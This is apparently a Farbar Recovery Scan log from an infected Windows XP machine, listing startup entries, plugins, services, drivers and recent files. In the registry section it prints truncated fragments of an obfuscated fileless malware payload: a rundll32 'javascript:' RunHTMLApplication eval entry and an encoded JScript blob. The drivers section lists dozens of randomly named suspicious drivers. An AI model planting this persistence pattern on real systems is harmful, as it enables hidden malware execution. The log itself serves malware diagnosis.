==================== Registry (Whitelisted) ==================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [PDVDDXSrv] => C:\Program Files\CyberLink\PowerDVD DX\PDVDDXSrv.exe [128232 2009-02-04] (CyberLink Corp.)
HKLM\...\Run: [APSDaemon] => C:\Program Files\Common Files\Apple\Apple Application Support\APSDaemon.exe [59720 2013-04-21] (Apple Inc.)
HKLM\...\Run: [Adobe ARM] => C:\Program Files\Common Files\Adobe\ARM\1.0\AdobeARM.exe [959904 2013-11-21] (Adobe Systems Incorporated)
HKLM\...\Run: [ToolboxFX] => C:\Program Files\HP\ToolboxFX\bin\HPTLBXFX.exe [58936 2010-10-25] (Hewlett-Packard Company)
HKLM\...\Run: [SpyHunter Security Suite] => C:\Program Files\Enigma Software Group\SpyHunter\SpyHunter4.exe [6434176 2014-01-09] (Enigma Software Group USA, LLC.)
HKLM\...\Run: [SoundMAXPnP] => C:\Program Files\Analog Devices\Core\smax4pnp.exe [1044480 2008-07-15] (Analog Devices, Inc.)
HKLM\...\Run: [QuickTime Task] => C:\Program Files\QuickTime\qttask.exe [421888 2014-01-17] (Apple Inc.)
HKLM\...\Run: [Malwarebytes' Anti-Malware] => C:\Program Files\Malwarebytes' Anti-Malware\mbamgui.exe [449608 2011-08-31] (Malwarebytes Corporation)
HKLM\...\Run: [Intuit SyncManager] => C:\Program Files\Common Files\Intuit\Sync\IntuitSyncManager.exe [2786104 2013-05-31] (Intuit Inc. All rights reserved.)
HKLM\...\Run: [hpbdfawep] => C:\Program Files\HP\Dfawep\bin\hpbdfawep.exe [954368 2007-04-25] ()
HKLM\...\Run: [HP Software Update] => C:\Program Files\Hp\HP Software Update\HPWuSchd2.exe [49208 2011-10-28] (Hewlett-Packard)
Winlogon\Notify\GoToAssist Express Customer: C:\Program Files\Citrix\GoToAssist Remote Support Customer\715\g2ax_winlogon.dll (Citrix Online, a division of Citrix Systems, Inc.)
Winlogon\Notify\GoToMyPC: C:\Program Files\Citrix\GoToMyPC\G2WinLogon.dll (Citrix Online, a division of Citrix Systems, Inc.)
Winlogon\Notify\intelsusb: ntusbw32.dll [X]
HKLM\...99B7938DA9E4}\LocalServer32: [Default-wmiprvse] rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 220 more characters). <==== ATTENTION!
HKLM\...99B7938DA9E4}\LocalServer32: [a] #@~^wH4AAA==n{F+2im'xh,)mDk-+or8%mYvEUmDb2ORUtVsJbIStrVc+e'*+*    Y.zPhxlc3XwC    NAx\bDKU:xO?DDrUT/ (the data entry has 32372 more characters). <==== ATTENTION!
InvalidSubkeyName: [HKLM\Software\Classes\CLSID\{73E709EA-5D93-4B2E-BBB0-99B7938DA9E4}\LocalServer32\******<*>] <===== ATTENTION
HKU\.DEFAULT\...\RunOnce: [FlashPlayerUpdate] => C:\WINDOWS\system32\Macromed\Flash\FlashUtil32_11_9_900_170_ActiveX.exe [839560 2014-01-01] (Adobe Systems Incorporated)
HKU\S-1-5-21-1173838982-2468196426-3268084377-1009\...\Run: [swg] => C:\Program Files\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe [39408 2010-05-24] (Google Inc.)
HKU\S-1-5-21-1173838982-2468196426-3268084377-1009\...\Run: [Starfield Updater] => C:\Program Files\Workspace\WorkspaceUpdate.exe [35008 2014-09-01] (Starfield Technologies)
HKU\S-1-5-21-1173838982-2468196426-3268084377-1009\...\Run: [InbitIMC] => C:\Program Files\24im\24im Messenger\IMC.EXE [3423744 2013-07-08] (24im LLC)
Startup: C:\Documents and Settings\All Users\Start Menu\Programs\Startup\Intuit Data Protect.lnk
ShortcutTarget: Intuit Data Protect.lnk -> C:\Program Files\Common Files\Intuit\DataProtect\IntuitDataProtect.exe (Intuit Inc.)
Startup: C:\Documents and Settings\All Users\Start Menu\Programs\Startup\QuickBooks Update Agent.lnk
ShortcutTarget: QuickBooks Update Agent.lnk -> C:\Program Files\Common Files\Intuit\QuickBooks\QBUpdate\qbupdate.exe (Intuit Inc.)
Startup: C:\Documents and Settings\All Users\Start Menu\Programs\Startup\QuickBooks_Standard_21.lnk
ShortcutTarget: QuickBooks_Standard_21.lnk -> C:\Program Files\Intuit\QuickBooks 2012\QBW32.EXE (Intuit Inc.)
ShellIconOverlayIdentifiers: off0 -> {8E33AEC3-C5F2-43C4-B048-9E3EB19B1DD5} => C:\Program Files\Workspace\offsyncext.dll (Starfield Technologies, LLC)
ShellIconOverlayIdentifiers: off1 -> {8E33AEC4-C5F2-43C4-B048-9E3EB19B1DD5} => C:\Program Files\Workspace\offsyncext.dll (Starfield Technologies, LLC)

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://google.com/
HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.live.com
HKCU\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://g.msn.com/USREL/1
HKCU\Software\Microsoft\Internet Explorer\Main,Search Bar = http://search.msn.com/sphome.aspx
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.msn.com/
BHO: Google Toolbar Helper -> {AA58ED58-01DD-4d91-8333-CF10577473F7} -> C:\Program Files\Google\Google Toolbar\GoogleToolbar_32.dll (Google Inc.)
BHO: Google Toolbar Notifier BHO -> {AF69DE43-7D58-4638-B6FA-CE66B5AD205D} -> C:\Program Files\Google\GoogleToolbarNotifier\5.7.9012.1008\swg.dll (Google Inc.)
Toolbar: HKLM - Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files\Google\Google Toolbar\GoogleToolbar_32.dll (Google Inc.)
Toolbar: HKCU - Google Toolbar - {2318C2B1-4965-11D4-9B18-009027A5CD4F} - C:\Program Files\Google\Google Toolbar\GoogleToolbar_32.dll (Google Inc.)
DPF: {051FE707-9706-11D5-A836-000102A7C938} http://certificates.amadeusvista.com/sgwadmin/common/AutoUpdateATL26P520.CAB
DPF: {17492023-C23A-453E-A040-C7C580BBF700} http://download.microsoft.com/download/E/5/6/E5611B10-0D6D-4117-8430-A67417AA88CD/LegitCheckControl.cab
DPF: {3839EEB1-774E-40AC-BB55-1FFF0F09FFBC} http://extranets.us.amadeus.com/techservices/documents/SoftwareDistribution/Amadeus-CS-MIA/AmadeusRailKeyAgent/v1003/install.cab
DPF: {469C92F9-CA8E-4C3E-9AD4-F74EEF097BCA} http://diagnostic.amadeus.com/travelagencies/Cabs/DS_Diagnostic.cab
DPF: {5CCB8990-66EF-4466-B051-CD27FA3821DF} http://content.amadeus.com/Scripts/AmadeusNALibrary/V2.0.0/install.cab
DPF: {6414512B-B978-451D-A0D8-FCFDF33E833C} http://update.microsoft.com/windowsupdate/v6/V5Controls/en/x86/client/wuweb_site.cab?1251711551578
DPF: {8AD9C840-044E-11D1-B3E9-00805F499D93} http://java.sun.com/update/1.6.0/jinstall-1_6_0_15-windows-i586.cab
DPF: {9D96A8C3-A6DA-47CC-BD44-A968B60C01EB} http://extranet.us.amadeus.com/techservices/documents/softwaredistribution/amadeus-cs-mia/FXG/v1.2.3/MasterPricerFXM.cab
DPF: {B3E32D88-8E7F-468F-B0E2-3A300FD4A82C} http://myitlab.pearsoned.com/Pegasus/Modules/SIMIntegration/Resources/ax/stub.cab
DPF: {C9E2242D-DC05-4C54-9483-A5C90653F7BC} https://techinline.net/Client/TIClient.cab
DPF: {CAFEEFAC-0016-0000-0015-ABCDEFFEDCBA} http://java.sun.com/update/1.6.0/jinstall-1_6_0_15-windows-i586.cab
DPF: {CAFEEFAC-FFFF-FFFF-FFFF-ABCDEFFEDCBA} http://java.sun.com/update/1.6.0/jinstall-1_6_0_15-windows-i586.cab
DPF: {DE625294-70E6-45ED-B895-CFFA13AEB044} http://80.179.197.227/activex/AMC.cab
DPF: {E06E2E99-0AA1-11D4-ABA6-0060082AA75C} https://ncr.webex.com/client/WBXclient-T27L10NSP32EP1-13926/webex/ieatgpc.cab
DPF: {E2883E8F-472F-4FB0-9522-AC9BF37916A7} http://platformdl.adobe.com/NOS/getPlusPlus/1.6/gp.cab
DPF: {E90EF4C9-1476-4C49-B926-97C7D9D30A06} http://certificates.amadeusvista.com/certificateinfo/CCCert_Info.CAB
DPF: {F96020DD-C373-44A0-82B6-064EF0AEEAE3} http://certificates.amadeusvista.com/sgwadmin/RegSiteTools.cab
Handler: intu-help-qb2 - {84D77A00-41B5-4b8b-8ADF-86486D72E749} - C:\Program Files\Intuit\QuickBooks 2006\HelpAsyncPluggableProtocol.dll (Intuit, Inc.)
Handler: intu-help-qb5 - {867FCB77-9823-4cd6-8210-D85F968D466F} - C:\Program Files\Intuit\QuickBooks 2012\HelpAsyncPluggableProtocol.dll (Intuit, Inc.)
Handler: ms-itss - {0A9007C0-4076-11D3-8789-0000F8105754} - C:\Program Files\Common Files\Microsoft Shared\Information Retrieval\MSITSS.DLL (Microsoft Corporation)
Handler: qbwc - {FC598A64-626C-4447-85B8-53150405FD57} - C:\WINDOWS\system32\mscoree.dll (Microsoft Corporation)
Winsock: Catalog5 01 mswsock.dll File Not found () ATTENTION: The LibraryPath should be "%SystemRoot%\System32\mswsock.dll"
Winsock: Catalog5 03 mswsock.dll File Not found () ATTENTION: The LibraryPath should be "%SystemRoot%\System32\mswsock.dll"
Tcpip\Parameters: [DhcpNameServer] 208.67.222.222 208.67.220.220
Tcpip\..\Interfaces\{03F00D1D-4288-4901-A4C3-F42AA00B1C9A}: [NameServer] 8.8.8.8,8.8.4.4,4.2.2.1,4.2.2.2,208.67.222.222,208.67.220.220,8.26.56.26,8.20.247.20,156.154.70.1,156.154.71.1

FireFox:
========
FF ProfilePath: C:\Documents and Settings\LW\Application Data\Mozilla\Firefox\Profiles\acyn7swx.default-1409541858578
FF Plugin: @adobe.com/FlashPlayer -> C:\WINDOWS\system32\Macromed\Flash\NPSWF32_11_9_900_117.dll ()
FF Plugin: @microsoft.com/WPF,version=3.5 -> c:\WINDOWS\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\NPWPF.dll (Microsoft Corporation)
FF Plugin: @tools.google.com/Google Update;version=3 -> C:\Program Files\Google\Update\1.3.24.15\npGoogleUpdate3.dll (Google Inc.)
FF Plugin: @tools.google.com/Google Update;version=9 -> C:\Program Files\Google\Update\1.3.24.15\npGoogleUpdate3.dll (Google Inc.)
FF Plugin: Adobe Reader -> C:\Program Files\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
FF Plugin HKCU: @citrixonline.com/appdetectorplugin -> C:\Documents and Settings\LW\Local Settings\Application Data\Citrix\Plugins\104\npappdetector.dll (Citrix Online)
FF Plugin HKCU: @starfield.com/off -> C:\Documents and Settings\LW\Application Data\Mozilla\Plugins\npoff.dll ( Starfield Technologies, LLC.)
FF Plugin HKCU: @starfield.com/wbe -> C:\Documents and Settings\LW\Application Data\Mozilla\Plugins\npwbe.dll (Starfield Technology, LLC)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\NPOFFICE.DLL (Microsoft Corporation)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\nppdf32.dll (Adobe Systems Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\npqtplugin.dll (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\npqtplugin2.dll (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\npqtplugin3.dll (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\npqtplugin4.dll (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\npqtplugin5.dll (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Documents and Settings\LW\Application Data\mozilla\plugins\npoff.dll ( Starfield Technologies, LLC.)
FF Plugin ProgramFiles/Appdata: C:\Documents and Settings\LW\Application Data\mozilla\plugins\npwbe.dll (Starfield Technology, LLC)
FF Extension: WBE Paste - C:\Documents and Settings\LW\Application Data\Mozilla\Extensions\{ec8030f7-c20a-464f-9b0e-13a3a9e97384}\wbepaste@starfield [2014-09-01]
FF Extension: Firefox Old Version Update Hotfix - C:\Documents and Settings\LW\Application Data\Mozilla\Firefox\Profiles\acyn7swx.default-1409541858578\Extensions\firefox-hotfix@mozilla.org.xpi [2014-08-31]
FF HKLM\...\Firefox\Extensions: [jqs@sun.com] - C:\Program Files\Java\jre6\lib\deploy\jqs\ff
FF Extension: Java Quick Starter - C:\Program Files\Java\jre6\lib\deploy\jqs\ff [2009-08-22]
FF HKLM\...\Firefox\Extensions: [{20a82645-c095-46ed-80e3-08825760534b}] - c:\WINDOWS\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension
FF Extension: Microsoft .NET Framework Assistant - c:\WINDOWS\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension [2009-12-27]
FF HKLM\...\Thunderbird\Extensions: [eplgTb@eset.com] - C:\Program Files\ESET\ESET NOD32 Antivirus\Mozilla Thunderbird
FF Extension: ESET Smart Security Extension - C:\Program Files\ESET\ESET NOD32 Antivirus\Mozilla Thunderbird [2014-01-01]

Chrome:
=======
CHR HomePage: Default -> hxxp://www.google.com/
CHR StartupUrls: Default -> "hxxp://www.google.com/"
CHR CustomProfile: C:\Documents and Settings\LW\Local Settings\Application Data\Google\Chrome\User Data\Default
CHR Extension: (Google Docs) - C:\Documents and Settings\LW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2014-07-24]
CHR Extension: (Google Drive) - C:\Documents and Settings\LW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2014-07-24]
CHR Extension: (Google Voice Search Hotword (Beta)) - C:\Documents and Settings\LW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\bepbmhgboaologfdajaanbcjmnhjmhfn [2014-07-31]
CHR Extension: (YouTube) - C:\Documents and Settings\LW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2014-07-24]
CHR Extension: (Google Search) - C:\Documents and Settings\LW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2014-07-24]
CHR Extension: (Google Wallet) - C:\Documents and Settings\LW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2014-07-24]
CHR Extension: (Gmail) - C:\Documents and Settings\LW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2014-07-24]
CHR HKLM\...\Chrome\Extension: [./0123456789:;<=>?@ABCDEFGHIJKLM] - C:\Documents and Settings\Lazer\Local Settings\Application Data\¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ []

========================== Services (Whitelisted) =================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

R2 Amadeus Automatic Update; C:\Program Files\Automatic Update\AutoUpdate.exe [236384 2013-03-28] (Amadeus)
R2 ekrn; C:\Program Files\ESET\ESET NOD32 Antivirus\ekrn.exe [1341664 2013-03-04] (ESET)
S2 File Backup; C:\Program Files\Workspace\offSyncService.exe [1187040 2013-07-22] (Starfield Technologies)
R2 GoToAssist Remote Support Customer; C:\Program Files\Citrix\GoToAssist Remote Support Customer\715\g2ax_service.exe [610888 2014-06-18] (Citrix Online, a division of Citrix Systems, Inc.)
R2 GoToMyPC; C:\Program Files\Citrix\GoToMyPC\g2svc.exe [1335640 2014-01-30] (Citrix Online, a division of Citrix Systems, Inc.)
R2 HP LaserJet Service; C:\Program Files\HP\HPLaserJetService\HPLaserJetService.exe [145920 2010-10-25] (HP) [File not signed]
S3 IDriverT; C:\Program Files\Common Files\InstallShield\Driver\1150\Intel 32\IDriverT.exe [69632 2005-11-14] (Macrovision Corporation) [File not signed]
R2 JavaQuickStarterService; C:\Program Files\Java\jre6\bin\jqs.exe [153376 2009-07-25] (Sun Microsystems, Inc.)
S2 MBAMService; C:\Program Files\Malwarebytes' Anti-Malware\mbamservice.exe [366152 2011-08-31] (Malwarebytes Corporation)
R2 QBCFMonitorService; C:\Program Files\Common Files\Intuit\QuickBooks\QBCFMonitorService.exe [45056 2013-05-31] (Intuit) [File not signed]
S3 QBFCService; C:\Program Files\Common Files\Intuit\QuickBooks\FCS\Intuit.QuickBooks.FCS.exe [61440 2012-01-10] (Intuit Inc.) [File not signed]
R2 QBVSS; C:\Program Files\Common Files\Intuit\DataProtect\QBIDPService.exe [1248256 2012-01-10] (Intuit Inc.) [File not signed]
R2 SpyHunter 4 Service; C:\Program Files\Enigma Software Group\SpyHunter\SH4Service.exe [770432 2014-01-09] (Enigma Software Group USA, LLC.)
S2 intelusb3; C:\WINDOWS\system32\inusbw32.dll [X]

==================== Drivers (Whitelisted) ====================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

S4 abp480n5; C:\WINDOWS\system32\DRIVERS\ABP480N5.SYS [23552 2001-08-17] (Microsoft Corporation)
S3 BVRPMPR5; C:\WINDOWS\system32\drivers\BVRPMPR5.SYS [49904 2009-08-25] (Avanquest Software) [File not signed]
R1 eamon; C:\WINDOWS\System32\DRIVERS\eamon.sys [161368 2013-01-10] (ESET)
R1 ehdrv; C:\WINDOWS\System32\DRIVERS\ehdrv.sys [122240 2013-01-10] (ESET)
R1 epfwtdir; C:\WINDOWS\System32\DRIVERS\epfwtdir.sys [105784 2013-01-10] (ESET)
R3 esgiguard; C:\Program Files\Enigma Software Group\SpyHunter\esgiguard.sys [12288 2014-01-07] ()
S3 EsgScanner; C:\WINDOWS\System32\DRIVERS\EsgScanner.sys [19984 2012-06-22] ()
R3 HPFXBULKLEDM; C:\WINDOWS\System32\drivers\hppcbulkio.sys [20504 2010-12-14] (Hewlett Packard)
R3 HPFXFAX; C:\WINDOWS\System32\drivers\hppcfaxio.sys [21528 2010-12-14] (Hewlett Packard)
R3 k57w2k; C:\WINDOWS\System32\DRIVERS\k57xp32.sys [176640 2008-06-19] (Broadcom Corporation)
R3 MBAMProtector; C:\WINDOWS\system32\drivers\mbam.sys [22216 2011-08-31] (Malwarebytes Corporation)
R2 monblanking; C:\WINDOWS\System32\DRIVERS\monblanking.sys [29280 2014-01-30] (Citrix Systems, Inc.)
R0 SFAUDIO; C:\WINDOWS\System32\drivers\sfaudio.sys [24064 2008-07-15] (Sonic Focus, Inc)
U3 .serial; \? [X]
S1 aiihtvcz; \??\C:\WINDOWS\system32\drivers\aiihtvcz.sys [X]
S1 ailnikoh; \??\C:\WINDOWS\system32\drivers\ailnikoh.sys [X]
S1 aodyekkc; \??\C:\WINDOWS\system32\drivers\aodyekkc.sys [X]
S1 aqtnxesc; \??\C:\WINDOWS\system32\drivers\aqtnxesc.sys [X]
S1 btrkhckt; \??\C:\WINDOWS\system32\drivers\btrkhckt.sys [X]
S1 cehdbmir; \??\C:\WINDOWS\system32\drivers\cehdbmir.sys [X]
S3 cpuz136; \??\C:\DOCUME~1\LW\LOCALS~1\Temp\cpuz136\cpuz136_x32.sys [X]
S1 crmhksvq; \??\C:\WINDOWS\system32\drivers\crmhksvq.sys [X]
S1 dcphysdl; \??\C:\WINDOWS\system32\drivers\dcphysdl.sys [X]
S1 dctzhdkr; \??\C:\WINDOWS\system32\drivers\dctzhdkr.sys [X]
S1 dhsjwnsa; \??\C:\WINDOWS\system32\drivers\dhsjwnsa.sys [X]
S1 diiedivm; \??\C:\WINDOWS\system32\drivers\diiedivm.sys [X]
S1 dkqlfxtu; \??\C:\WINDOWS\system32\drivers\dkqlfxtu.sys [X]
S1 dywxjbpu; \??\C:\WINDOWS\system32\drivers\dywxjbpu.sys [X]
S1 elanvibc; \??\C:\WINDOWS\system32\drivers\elanvibc.sys [X]
S1 elueucdm; \??\C:\WINDOWS\system32\drivers\elueucdm.sys [X]
S1 emqorjrh; \??\C:\WINDOWS\system32\drivers\emqorjrh.sys [X]
S1 ffwjjktp; \??\C:\WINDOWS\system32\drivers\ffwjjktp.sys [X]
S1 fuwdcpag; \??\C:\WINDOWS\system32\drivers\fuwdcpag.sys [X]
S1 gjqdovsr; \??\C:\WINDOWS\system32\drivers\gjqdovsr.sys [X]
S1 hdzpacyh; \??\C:\WINDOWS\system32\drivers\hdzpacyh.sys [X]
S1 hkjraftu; \??\C:\WINDOWS\system32\drivers\hkjraftu.sys [X]
S1 hkqzjurj; \??\C:\WINDOWS\system32\drivers\hkqzjurj.sys [X]
S1 hudgwneh; \??\C:\WINDOWS\system32\drivers\hudgwneh.sys [X]
S1 hwnaxqhi; \??\C:\WINDOWS\system32\drivers\hwnaxqhi.sys [X]
S1 icjfktdr; \??\C:\WINDOWS\system32\drivers\icjfktdr.sys [X]
S1 ifcaadgw; \??\C:\WINDOWS\system32\drivers\ifcaadgw.sys [X]
S1 iojgrniz; \??\C:\WINDOWS\system32\drivers\iojgrniz.sys [X]
S1 itdfmkmf; \??\C:\WINDOWS\system32\drivers\itdfmkmf.sys [X]
S1 izuejwga; \??\C:\WINDOWS\system32\drivers\izuejwga.sys [X]
S1 jkysozto; \??\C:\WINDOWS\system32\drivers\jkysozto.sys [X]
S1 jneissmq; \??\C:\WINDOWS\system32\drivers\jneissmq.sys [X]
S1 jumggzng; \??\C:\WINDOWS\system32\drivers\jumggzng.sys [X]
S1 kbuuifwp; \??\C:\WINDOWS\system32\drivers\kbuuifwp.sys [X]
S1 krsrhnrw; \??\C:\WINDOWS\system32\drivers\krsrhnrw.sys [X]
S1 lksnxksg; \??\C:\WINDOWS\system32\drivers\lksnxksg.sys [X]
S1 lxnsddjw; \??\C:\WINDOWS\system32\drivers\lxnsddjw.sys [X]
S1 nmarzldd; \??\C:\WINDOWS\system32\drivers\nmarzldd.sys [X]
S1 oyqnomxu; \??\C:\WINDOWS\system32\drivers\oyqnomxu.sys [X]
S1 oznnujzj; \??\C:\WINDOWS\system32\drivers\oznnujzj.sys [X]
S1 pqebwcvo; \??\C:\WINDOWS\system32\drivers\pqebwcvo.sys [X]
S1 pxjpomgz; \??\C:\WINDOWS\system32\drivers\pxjpomgz.sys [X]
S1 qbjxztan; \??\C:\WINDOWS\system32\drivers\qbjxztan.sys [X]
S1 qdqqqeox; \??\C:\WINDOWS\system32\drivers\qdqqqeox.sys [X]
S1 qtiughlc; \??\C:\WINDOWS\system32\drivers\qtiughlc.sys [X]
S1 qvndeefi; \??\C:\WINDOWS\system32\drivers\qvndeefi.sys [X]
S1 rvweqwzh; \??\C:\WINDOWS\system32\drivers\rvweqwzh.sys [X]
S1 rycglvcj; \??\C:\WINDOWS\system32\drivers\rycglvcj.sys [X]
S1 spsewroy; \??\C:\WINDOWS\system32\drivers\spsewroy.sys [X]
S1 tddacvcd; \??\C:\WINDOWS\system32\drivers\tddacvcd.sys [X]
S1 tqolobyj; \??\C:\WINDOWS\system32\drivers\tqolobyj.sys [X]
S1 uxqezgeh; \??\C:\WINDOWS\system32\drivers\uxqezgeh.sys [X]
S1 vdmrhszs; \??\C:\WINDOWS\system32\drivers\vdmrhszs.sys [X]
S1 vxgwctzc; \??\C:\WINDOWS\system32\drivers\vxgwctzc.sys [X]
S1 wlkiibdz; \??\C:\WINDOWS\system32\drivers\wlkiibdz.sys [X]
S1 wnhyorkd; \??\C:\WINDOWS\system32\drivers\wnhyorkd.sys [X]

==================== NetSvcs (Whitelisted) ===================


(If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.)


==================== One Month Created Files and Folders ========

(If an entry is included in the fixlist, the file\folder will be moved.)

2014-09-01 12:29 - 2014-09-01 12:34 - 00000000 ____D () C:\FRST
2014-09-01 11:50 - 2014-09-01 11:50 - 00000310 _____ () C:\WINDOWS\Tasks\HP WEP.job
2014-09-01 11:50 - 2014-09-01 11:50 - 00000000 ____D () C:\Documents and Settings\LW\Local Settings\Application Data\offsync
2014-09-01 11:38 - 2014-09-01 11:39 - 00001365 _____ () C:\Documents and Settings\LW\My Documents\WorkspaceInstall.log
2014-09-01 11:38 - 2014-09-01 11:39 - 00000613 _____ () C:\Documents and Settings\LW\My Documents\WorkspaceUpdate.log
2014-09-01 11:38 - 2014-09-01 11:38 - 00000000 ____D () C:\Documents and Settings\LW\Local Settings\Application Data\Workspace
2014-09-01 10:58 - 2014-09-01 10:58 - 00000733 _____ () C:\Documents and Settings\Mr W\Desktop\DesktopTools.lnk
2014-09-01 10:58 - 2014-09-01 10:58 - 00000000 ____D () C:\Documents and Settings\Mr W\Start Menu\Programs\Workspace
2014-09-01 10:58 - 2014-09-01 10:58 - 00000000 ____D () C:\Documents and Settings\Mr W\Local Settings\Application Data\Workspace
2014-09-01 10:58 - 2014-09-01 10:58 - 00000000 ____D () C:\Documents and Settings\Mr W\Application Data\Apple Computer
2014-09-01 10:57 - 2014-09-01 12:15 - 00045939 _____ () C:\WINDOWS\WindowsUpdate.log
2014-09-01 10:57 - 2014-09-01 11:37 - 00001304 _____ () C:\WINDOWS\offSyncService.log
2014-09-01 10:57 - 2014-09-01 10:57 - 00266208 _____ () C:\WINDOWS\system32\FNTCACHE.DAT
2014-09-01 10:57 - 2014-09-01 10:57 - 00090112 _____ () C:\WINDOWS\Minidump\Mini090114-01.dmp
2014-09-01 00:02 - 2014-09-01 11:33 - 00000000 ___SD () C:\32788R22FWJFW
2014-09-01 00:02 - 2014-09-01 00:02 - 00000000 ____D () C:\WINDOWS\erdnt
2014-08-31 23:53 - 2014-08-31 23:54 - 05576326 ____R (Swearware) C:\Documents and Settings\LW\Desktop\ComboFix.exe
2014-08-31 23:31 - 2014-08-31 23:43 - 00000000 ____D () C:\Documents and Settings\LW\Local Settings\Application Data\NPE
2014-08-31 23:24 - 2014-09-01 10:57 - 00000000 ____D () C:\Documents and Settings\All Users\Application Data\BoostSoftware
2014-08-31 23:24 - 2014-08-31 23:24 - 00000000 ____D () C:\Documents and Settings\LW\Desktop\Old Firefox Data
2014-08-31 21:12 - 2014-08-31 21:12 - 00001973 _____ () C:\Documents and Settings\Mr W\Desktop\SpyHunter.lnk
2014-08-31 21:12 - 2014-08-31 21:12 - 00000990 _____ () C:\WINDOWS\setupapi.log
2014-08-31 21:12 - 2014-08-31 21:12 - 00000000 ____D () C:\sh4ldr
2014-08-31 21:12 - 2014-08-31 21:12 - 00000000 ____D () C:\Program Files\Enigma Software Group
2014-08-31 21:12 - 2014-08-31 21:12 - 00000000 ____D () C:\Documents and Settings\Mr W\Start Menu\Programs\SpyHunter
2014-08-31 21:09 - 2014-08-31 21:12 - 00000000 ____D () C:\WINDOWS\B2C80E75240948EC8D4828113DF74915.TMP
2014-08-31 21:06 - 2014-08-31 21:06 - 00000000 ____D () C:\Program Files\Common Files\Wise Installation Wizard
2014-08-31 21:01 - 2014-08-31 21:01 - 00727424 _____ (Enigma Software Group USA, LLC.) C:\Documents and Settings\Mr W\My Documents\SHDownloader-FULL.exe
2014-08-31 20:26 - 2014-08-31 20:26 - 00000000 ____D () C:\Documents and Settings\Mr W\Application Data\ParetoLogic
2014-08-31 20:26 - 2014-08-31 20:26 - 00000000 ____D () C:\Documents and Settings\Mr W\Application Data\DriverCure
2014-08-31 20:25 - 2014-08-31 20:25 - 00000000 ____D () C:\Documents and Settings\Mr W\Application Data\Macromedia
2014-08-31 20:23 - 2014-08-31 20:23 - 00000000 ____D () C:\Documents and Settings\Mr W\Application Data\Google
2014-08-31 20:21 - 2014-08-31 20:21 - 00000000 ____D () C:\Documents and Settings\Mr W\Local Settings\Application Data\Adobe
2014-08-31 20:21 - 2014-08-31 20:21 - 00000000 ____D () C:\Documents and Settings\Mr W\Application Data\Adobe
2014-08-31 19:52 - 2014-09-01 10:59 - 00000000 ____D () C:\Documents and Settings\Mr W\Local Settings\Temp
2014-08-31 19:52 - 2014-08-31 23:04 - 00000178 ___SH () C:\Documents and Settings\Mr W\ntuser.ini
2014-08-31 19:52 - 2014-08-31 20:27 - 00001601 _____ () C:\Documents and Settings\Mr W\Start Menu\Programs\Remote Assistance.LNK
2014-08-31 19:52 - 2014-08-31 20:24 - 00000000 ____D () C:\Documents and Settings\Mr W
2014-08-31 19:52 - 2014-08-31 20:23 - 00000000 ____D () C:\Documents and Settings\Mr W\Local Settings\Application Data\Google
2014-08-31 19:52 - 2014-08-31 19:52 - 00000805 _____ () C:\Documents and Settings\Mr W\Start Menu\Programs\Internet Explorer.lnk
2014-08-31 19:52 - 2014-08-31 19:52 - 00000790 _____ () C:\Documents and Settings\Mr W\Start Menu\Programs\Windows Media Player.lnk
2014-08-31 19:52 - 2014-08-31 19:52 - 00000784 _____ () C:\Documents and Settings\Mr W\Desktop\Windows Media Player.lnk
2014-08-31 19:52 - 2014-08-31 19:52 - 00000740 _____ () C:\Documents and Settings\Mr W\Start Menu\Programs\Outlook Express.LNK
2014-08-31 19:52 - 2014-08-31 19:52 - 00000000 __SHD () C:\Documents and Settings\Mr W\IETldCache
2014-08-31 19:52 - 2014-08-31 19:52 - 00000000 ___RD () C:\Documents and Settings\Mr W\Start Menu\Programs\Accessories
2014-08-31 19:52 - 2009-08-22 04:19 - 00000000 ____D () C:\Documents and Settings\Mr W\Local Settings\Application Data\PowerDVD DX
